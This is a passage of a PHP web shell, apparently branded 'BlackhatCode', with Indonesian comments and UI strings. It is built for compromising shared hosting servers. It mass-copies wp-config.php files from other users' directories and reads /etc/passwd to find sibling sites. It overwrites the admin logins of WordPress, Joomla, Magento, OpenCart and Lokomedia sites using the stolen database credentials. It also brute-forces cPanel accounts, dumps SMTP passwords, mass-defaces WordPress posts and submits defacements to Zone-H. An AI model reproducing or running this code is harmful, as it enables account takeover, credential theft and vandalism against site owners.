  2608.                     "/home3/$usere_cok/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2609.                     "/home3/$usere_cok/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",       
  2610.                     "/home3/$usere_cok/public_html/Home/wp-config.php" => "WordPressHome",
  2611.                     "/home3/$usere_cok/public_html/HOME/wp-config.php" => "WordPressHome",
  2612.                     "/home3/$usere_cok/public_html/home/wp-config.php" => "WordPressHome",
  2613.                     "/home3/$usere_cok/public_html/NEW/wp-config.php" => "WordPressNew",
  2614.                     "/home3/$usere_cok/public_html/New/wp-config.php" => "WordPressNew",
  2615.                     "/home3/$usere_cok/public_html/new/wp-config.php" => "WordPressNew",
  2616.                     "/home3/$usere_cok/public_html/News/wp-config.php" => "WordPressNews",
  2617.                     "/home3/$usere_cok/public_html/NEWS/wp-config.php" => "WordPressNews",
  2618.                     "/home3/$usere_cok/public_html/news/wp-config.php" => "WordPressNews",
  2619.                     "/home3/$usere_cok/public_html/Cms/wp-config.php" => "WordPressCms",
  2620.                     "/home3/$usere_cok/public_html/CMS/wp-config.php" => "WordPressCms",
  2621.                     "/home3/$usere_cok/public_html/cms/wp-config.php" => "WordPressCms",
  2622.                     "/home3/$usere_cok/public_html/Main/wp-config.php" => "WordPressMain",
  2623.                     "/home3/$usere_cok/public_html/MAIN/wp-config.php" => "WordPressMain",
  2624.                     "/home3/$usere_cok/public_html/main/wp-config.php" => "WordPressMain",
  2625.                     "/home3/$usere_cok/public_html/Blog/wp-config.php" => "WordPressBlog",
  2626.                     "/home3/$usere_cok/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2627.                     "/home3/$usere_cok/public_html/blog/wp-config.php" => "WordPressBlog",
  2628.                     "/home3/$usere_cok/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2629.                     "/home3/$usere_cok/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2630.                     "/home3/$usere_cok/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2631.                     "/home3/$usere_cok/public_html/beta/wp-config.php" => "WordPressBeta",
  2632.                     "/home3/$usere_cok/public_html/Beta/wp-config.php" => "WordPressBeta",
  2633.                     "/home3/$usere_cok/public_html/BETA/wp-config.php" => "WordPressBeta",
  2634.                     "/home3/$usere_cok/public_html/PRESS/wp-config.php" => "WordPressPress",
  2635.                     "/home3/$usere_cok/public_html/Press/wp-config.php" => "WordPressPress",
  2636.                     "/home3/$usere_cok/public_html/press/wp-config.php" => "WordPressPress",
  2637.                     "/home3/$usere_cok/public_html/Wp/wp-config.php" => "WordPressWp",
  2638.                     "/home3/$usere_cok/public_html/wp/wp-config.php" => "WordPressWp",
  2639.                     "/home3/$usere_cok/public_html/WP/wp-config.php" => "WordPressWP",
  2640.                     "/home3/$usere_cok/public_html/portal/wp-config.php" => "WordPressPortal",
  2641.                     "/home3/$usere_cok/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2642.                     "/home3/$usere_cok/public_html/Portal/wp-config.php" => "WordPressPortal"                  
  2643.                         ); 
  2644.                     foreach($grab_config as $config => $nama_config) {
  2645.                         $ambil_config = file_get_contents($config);
  2646.                         if($ambil_config == '') {
  2647.                         } else {
  2648.                             $file_config = fopen("bct_config1/$usere_cok-$nama_config.txt","w");
  2649.                             fputs($file_config,$ambil_config);
  2650.                         }
  2651.                     }
  2652.                 }      
  2653.             }
  2654.             echo "<center><a href='?dir=$dir/bct_config1'><font color=lime>Done</font></a></center>";
  2655.             }else{
  2656.                
  2657.         echo "<form method=\"post\" action=\"\"><center>/etc/passwd/ ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2658.         echo file_get_contents('/etc/passwd');
  2659.         echo "</textarea><br><input type=\"submit\" value=\"Start Get Config\"></td></tr></center>\n";
  2660.         }
  2661. } elseif($_GET['do'] == 'jumping') {
  2662.     $i = 0;
  2663.     echo "<div class='margin: 5px auto;'>";
  2664.     if(preg_match("/hsphere/", $dir)) {
  2665.         $urls = explode("\r\n", $_POST['url']);
  2666.         if(isset($_POST['jump'])) {
  2667.             echo "<pre>";
  2668.             foreach($urls as $url) {
  2669.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  2670.                 $etc = "/etc/passwd";
  2671.                 $f = fopen($etc,"r");
  2672.                 while($gets = fgets($f)) {
  2673.                     $pecah = explode(":", $gets);
  2674.                     $user = $pecah[0];
  2675.                     $dir_user = "/hsphere/local/home/$user";
  2676.                     if(is_dir($dir_user) === true) {
  2677.                         $url_user = $dir_user."/".$url;
  2678.                         if(is_readable($url_user)) {
  2679.                             $i++;
  2680.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  2681.                             if(is_writable($url_user)) {
  2682.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  2683.                             }
  2684.                             echo $jrw."<br>";
  2685.                         }
  2686.                     }
  2687.                 }
  2688.             }
  2689.         if($i == 0) {
  2690.         } else {
  2691.             echo "<br>Total ada ".$i." Kimcil di ".$ip;
  2692.         }
  2693.         echo "</pre>";
  2694.         } else {
  2695.             echo '<center>
  2696.                   <form method="post">
  2697.                   List Domains: <br>
  2698.                   <textarea name="url" style="width: 500px; height: 250px;">';
  2699.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  2700.             while($getss = fgets($fp)) {
  2701.                 echo $getss;
  2702.             }
  2703.             echo  '</textarea><br>
  2704.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  2705.                   </form></center>';
  2706.         }
  2707.     } elseif(preg_match("/vhosts/", $dir)) {
  2708.         $urls = explode("\r\n", $_POST['url']);
  2709.         if(isset($_POST['jump'])) {
  2710.             echo "<pre>";
  2711.             foreach($urls as $url) {
  2712.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  2713.                 if(is_dir($web_vh) === true) {
  2714.                     if(is_readable($web_vh)) {
  2715.                         $i++;
  2716.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  2717.                         if(is_writable($web_vh)) {
  2718.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  2719.                         }
  2720.                         echo $jrw."<br>";
  2721.                     }
  2722.                 }
  2723.             }
  2724.         if($i == 0) {
  2725.         } else {
  2726.             echo "<br>Total ada ".$i." Kimcil di ".$ip;
  2727.         }
  2728.         echo "</pre>";
  2729.         } else {
  2730.             echo '<center>
  2731.                   <form method="post">
  2732.                   List Domains: <br>
  2733.                   <textarea name="url" style="width: 500px; height: 250px;">';
  2734.                   bing("ip:$ip");
  2735.             echo  '</textarea><br>
  2736.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  2737.                   </form></center>';
  2738.         }
  2739.     } else {
  2740.         echo "<pre>";
  2741.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  2742.         while($passwd = fgets($etc)) {
  2743.             if($passwd == '' || !$etc) {
  2744.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2745.             } else {
  2746.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2747.                 foreach($user_jumping[1] as $user_idx_jump) {
  2748.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  2749.                     if(is_readable($user_jumping_dir)) {
  2750.                         $i++;
  2751.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2752.                         if(is_writable($user_jumping_dir)) {
  2753.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2754.                         }
  2755.                         echo $jrw;
  2756.                         if(function_exists('posix_getpwuid')) {
  2757.                             $domain_jump = file_get_contents("/etc/named.conf");   
  2758.                             if($domain_jump == '') {
  2759.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2760.                             } else {
  2761.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2762.                                 foreach($domains_jump[1] as $dj) {
  2763.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2764.                                     $user_jumping_url = $user_jumping_url['name'];
  2765.                                     if($user_jumping_url == $user_idx_jump) {
  2766.                                         echo " => ( <u>$dj</u> )<br>";
  2767.                                         break;
  2768.                                     }
  2769.                                 }
  2770.                             }
  2771.                         } else {
  2772.                             echo "<br>";
  2773.                         }
  2774.                     }
  2775.                 }
  2776.             }
  2777.         }
  2778.         if($i == 0) {
  2779.         } else {
  2780.             echo "<br>Total ada ".$i." Kimcil di ".$ip;
  2781.         }
  2782.         echo "</pre>";
  2783.     }
  2784.     echo "</div>";
  2785. } elseif($_GET['do'] == 'auto_edit_user') {
  2786.     if($_POST['hajar']) {
  2787.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2788.             echo "username atau password harus lebih dari 6 karakter";
  2789.         } else {
  2790.             $user_baru = $_POST['user_baru'];
  2791.             $pass_baru = md5($_POST['pass_baru']);
  2792.             $conf = $_POST['config_dir'];
  2793.             $scan_conf = scandir($conf);
  2794.             foreach($scan_conf as $file_conf) {
  2795.                 if(!is_file("$conf/$file_conf")) continue;
  2796.                 $config = file_get_contents("$conf/$file_conf");
  2797.                 if(preg_match("/JConfig|joomla/",$config)) {
  2798.                     $dbhost = ambilkata($config,"host = '","'");
  2799.                     $dbuser = ambilkata($config,"user = '","'");
  2800.                     $dbpass = ambilkata($config,"password = '","'");
  2801.                     $dbname = ambilkata($config,"db = '","'");
  2802.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2803.                     $prefix = $dbprefix."users";
  2804.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2805.                     $db = mysql_select_db($dbname);
  2806.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2807.                     $result = mysql_fetch_array($q);
  2808.                     $id = $result['id'];
  2809.                     $site = ambilkata($config,"sitename = '","'");
  2810.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2811.                     echo "Config => ".$file_conf."<br>";
  2812.                     echo "CMS => Joomla<br>";
  2813.                     if($site == '') {
  2814.                         echo "Sitename => <font color=red>Error, gabisa ambil nama domain nya</font><br>";
  2815.                     } else {
  2816.                         echo "Sitename => $site<br>";
  2817.                     }
  2818.                     if(!$update OR !$conn OR !$db) {
  2819.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2820.                     } else {
  2821.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2822.                     }
  2823.                     mysql_close($conn);
  2824.                 } elseif(preg_match("/WordPress/",$config)) {
  2825.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2826.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2827.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2828.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2829.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2830.                     $prefix = $dbprefix."users";
  2831.                     $option = $dbprefix."options";
  2832.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2833.                     $db = mysql_select_db($dbname);
  2834.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2835.                     $result = mysql_fetch_array($q);
  2836.                     $id = $result[ID];
  2837.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2838.                     $result2 = mysql_fetch_array($q2);
  2839.                     $target = $result2[option_value];
  2840.                     if($target == '') {
  2841.                         $url_target = "Login => <font color=red>Error, gabisa ambil nama domain nyaa</font><br>";
  2842.                     } else {
  2843.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2844.                     }
  2845.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2846.                     echo "Config => ".$file_conf."<br>";
  2847.                     echo "CMS => Wordpress<br>";
  2848.                     echo $url_target;
  2849.                     if(!$update OR !$conn OR !$db) {
  2850.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2851.                     } else {
  2852.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2853.                     }
  2854.                     mysql_close($conn);
  2855.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2856.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2857.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2858.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2859.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2860.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2861.                     $prefix = $dbprefix."admin_user";
  2862.                     $option = $dbprefix."core_config_data";
  2863.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2864.                     $db = mysql_select_db($dbname);
  2865.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2866.                     $result = mysql_fetch_array($q);
  2867.                     $id = $result[user_id];
  2868.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2869.                     $result2 = mysql_fetch_array($q2);
  2870.                     $target = $result2[value];
  2871.                     if($target == '') {
  2872.                         $url_target = "Login => <font color=red>Error, gabisa ambil nama domain nyaa</font><br>";
  2873.                     } else {
  2874.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2875.                     }
  2876.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2877.                     echo "Config => ".$file_conf."<br>";
  2878.                     echo "CMS => Magento<br>";
  2879.                     echo $url_target;
  2880.                     if(!$update OR !$conn OR !$db) {
  2881.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2882.                     } else {
  2883.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2884.                     }
  2885.                     mysql_close($conn);
  2886.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2887.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2888.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2889.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2890.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2891.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2892.                     $prefix = $dbprefix."user";
  2893.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2894.                     $db = mysql_select_db($dbname);
  2895.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2896.                     $result = mysql_fetch_array($q);
  2897.                     $id = $result[user_id];
  2898.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  2899.                     if($target == '') {
  2900.                         $url_target = "Login => <font color=red>Error, gabisa ambil nama domain nyaa</font><br>";
  2901.                     } else {
  2902.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2903.                     }
  2904.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2905.                     echo "Config => ".$file_conf."<br>";
  2906.                     echo "CMS => OpenCart<br>";
  2907.                     echo $url_target;
  2908.                     if(!$update OR !$conn OR !$db) {
  2909.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2910.                     } else {
  2911.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2912.                     }
  2913.                     mysql_close($conn);
  2914.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2915.                     $dbhost = ambilkata($config,'server = "','"');
  2916.                     $dbuser = ambilkata($config,'username = "','"');
  2917.                     $dbpass = ambilkata($config,'password = "','"');
  2918.                     $dbname = ambilkata($config,'database = "','"');
  2919.                     $prefix = "users";
  2920.                     $option = "identitas";
  2921.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2922.                     $db = mysql_select_db($dbname);
  2923.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2924.                     $result = mysql_fetch_array($q);
  2925.                     $target = $result[alamat_website];
  2926.                     if($target == '') {
  2927.                         $target2 = $result[url];
  2928.                         $url_target = "Login => <font color=red>Error, gabisa ambil nama domain nyaa</font><br>";
  2929.                         if($target2 == '') {
  2930.                             $url_target2 = "Login => <font color=red>Error, gabisa ambil nama domain nyaa</font><br>";
  2931.                         } else {
  2932.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  2933.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2934.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2935.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2936.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2937.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2938.                             } else {
  2939.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2940.                             }
  2941.                         }
  2942.                     } else {
  2943.                         $cek_login = file_get_contents("$target/adminweb/");
  2944.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2945.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2946.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2947.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2948.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2949.                         } else {
  2950.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2951.                         }
  2952.                     }
  2953.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2954.                     echo "Config => ".$file_conf."<br>";
  2955.                     echo "CMS => Lokomedia<br>";
  2956.                     if(preg_match('/Error, gabisa ambil nama domain nya/', $url_target)) {
  2957.                         echo $url_target2;
  2958.                     } else {
  2959.                         echo $url_target;
  2960.                     }
  2961.                     if(!$update OR !$conn OR !$db) {
  2962.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2963.                     } else {
  2964.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2965.                     }
  2966.                     mysql_close($conn);
  2967.                 }
  2968.             }
  2969.         }
  2970.     } else {
  2971.         echo "<center>
  2972.         <h1>Auto Edit User Config</h1>
  2973.         <form method='post'>
  2974.         DIR Config: <br>
  2975.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2976.         Set User & Pass: <br>
  2977.         <input type='text' name='user_baru' value='blackhatcode' placeholder='user_baru'><br>
  2978.         <input type='text' name='pass_baru' value='blackhatcode' placeholder='pass_baru'><br>
  2979.         <input type='submit' name='hajar' value='Start Now!' style='width: 215px;'>
  2980.         </form>
  2981.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2982.         ";
  2983.     }  
  2984. }
  2985.  elseif($_GET['do'] == 'cpanel') {
  2986.     if($_POST['crack']) {
  2987.         $usercp = explode("\r\n", $_POST['user_cp']);
  2988.         $passcp = explode("\r\n", $_POST['pass_cp']);
  2989.         $i = 0;
  2990.         foreach($usercp as $ucp) {
  2991.             foreach($passcp as $pcp) {
  2992.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  2993.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2994.                     } else {
  2995.                         $_SESSION[$ucp] = "1";
  2996.                         $_SESSION[$pcp] = "1";
  2997.                         $i++;
  2998.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2999.                     }
  3000.                 }
  3001.             }
  3002.         }
  3003.         if($i == 0) {
  3004.         } else {
  3005.             echo "<br>Find ".$i." Cpanel by <font color=lime>BlackhatCode</font>";
  3006.         }
  3007.     } else {
  3008.         echo "<br><center>
  3009.         <form method='post'>
  3010.         USER: <br>
  3011.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3012.         $_usercp = fopen("/etc/passwd","r");
  3013.         while($getu = fgets($_usercp)) {
  3014.             if($getu == '' || !$_usercp) {
  3015.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3016.             } else {
  3017.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3018.                 foreach($u[1] as $user_cp) {
  3019.                         if(is_dir("/home/$user_cp/public_html")) {
  3020.                             echo "$user_cp\n";
  3021.                     }
  3022.                 }
  3023.             }
  3024.         }
  3025.         echo "</textarea><br>
  3026.         PASS: <br>
  3027.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3028.         function cp_pass($dir) {
  3029.             $pass = "";
  3030.             $dira = scandir($dir);
  3031.             foreach($dira as $dirb) {
  3032.                 if(!is_file("$dir/$dirb")) continue;
  3033.                 $ambil = file_get_contents("$dir/$dirb");
  3034.                 if(preg_match("/WordPress/", $ambil)) {
  3035.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3036.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3037.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3038.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3039.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3040.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3041.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3042.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3043.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3044.                 } elseif(preg_match("/client/", $ambil)) {
  3045.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3046.                     if(preg_match('/"/', $pass1[1])) {
  3047.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3048.                         $pass .= $pass1[1]."\n";
  3049.                     }
  3050.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3051.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3052.                 }
  3053.             }
  3054.             echo $pass;
  3055.         }
  3056.         $cp_pass = cp_pass($dir);
  3057.         echo $cp_pass;
  3058.         echo "</textarea><br>
  3059.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3060.         </form>
  3061.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3062.     }
  3063. } elseif($_GET['do'] == 'smtp') {
  3064.     echo "<br><center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3065.     function scj($dir) {
  3066.         $dira = scandir($dir);
  3067.         foreach($dira as $dirb) {
  3068.             if(!is_file("$dir/$dirb")) continue;
  3069.             $ambil = file_get_contents("$dir/$dirb");
  3070.             $ambil = str_replace("$", "", $ambil);
  3071.             if(preg_match("/JConfig|joomla/", $ambil)) {
  3072.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3073.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3074.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3075.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3076.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3077.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3078.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  3079.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  3080.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  3081.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  3082.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  3083.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  3084.             }
  3085.         }
  3086.     }
  3087.     $smpt_hunter = scj($dir);
  3088.     echo $smpt_hunter;
  3089. } elseif($_GET['do'] == 'auto_wp') {
  3090.     if($_POST['hajar']) {
  3091.         $title = htmlspecialchars($_POST['new_title']);
  3092.         $pn_title = str_replace(" ", "-", $title);
  3093.         if($_POST['cek_edit'] == "Y") {
  3094.             $script = $_POST['edit_content'];
  3095.         } else {
  3096.             $script = $title;
  3097.         }
  3098.         $conf = $_POST['config_dir'];
  3099.         $scan_conf = scandir($conf);
  3100.         foreach($scan_conf as $file_conf) {
  3101.             if(!is_file("$conf/$file_conf")) continue;
  3102.             $config = file_get_contents("$conf/$file_conf");
  3103.             if(preg_match("/WordPress/", $config)) {
  3104.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3105.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3106.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3107.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3108.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3109.                 $prefix = $dbprefix."posts";
  3110.                 $option = $dbprefix."options";
  3111.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3112.                 $db = mysql_select_db($dbname);
  3113.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3114.                 $result = mysql_fetch_array($q);
  3115.                 $id = $result[ID];
  3116.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3117.                 $result2 = mysql_fetch_array($q2);
  3118.                 $target = $result2[option_value];
  3119.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3120.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3121.                 echo "<div style='margin: 5px auto;'>";
  3122.                 if($target == '') {
  3123.                     echo "URL: <font color=red>Error, gabisa ambil nama domain nya</font> -> ";
  3124.                 } else {
  3125.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3126.                 }
  3127.                 if(!$update OR !$conn OR !$db) {
  3128.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3129.                 } else {
  3130.                     echo "<font color=lime>sukses di ganti.</font><br>";
  3131.                 }
  3132.                 echo "</div>";
  3133.                 mysql_close($conn);
  3134.             }
  3135.         }
  3136.     } else {
  3137.         echo "<center>
  3138.         <h1>Auto Edit Title+Content WordPress</h1>
  3139.         <form method='post'>
  3140.         DIR Config: <br>
  3141.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3142.         Set Title: <br>
  3143.         <input type='text' name='new_title' value='Hacked By BlackhatCode' placeholder='New Title'><br><br>
  3144.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3145.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3146.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/raw/A0rGGgJe' style='width: 450px; height: 150px;'></textarea><br>
  3147.         <input type='submit' name='hajar' value='Start Now!' style='width: 450px;'><br>
  3148.         </form>
  3149.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3150.         ";
  3151.     }
  3152. } elseif($_GET['do'] == 'zoneh') {
  3153.     if($_POST['submit']) {
  3154.         $domain = explode("\r\n", $_POST['url']);
  3155.         $nick =  $_POST['nick'];
  3156.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3157.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3158.         function zoneh($url,$nick) {
  3159.             $ch = curl_init("http://www.zone-h.com/notify/single");
  3160.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3161.                   curl_setopt($ch, CURLOPT_POST, true);
  3162.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3163.             return curl_exec($ch);
  3164.                   curl_close($ch);
  3165.         }
  3166.         foreach($domain as $url) {
  3167.             $zoneh = zoneh($url,$nick);
  3168.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3169.                 echo "$url -> <font color=lime>OK</font><br>";
  3170.             } else {
  3171.                 echo "$url -> <font color=red>ERROR</font><br>";
  3172.             }
  3173.         }
  3174.     } else {
  3175.         echo "<br><center><form method='post'>
  3176.         <u>Defacer</u>: <br>
  3177.         <input type='text' name='nick' size='50' value='BlackhatCode'><br>
  3178.         <u>Domains</u>: <br>
  3179.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
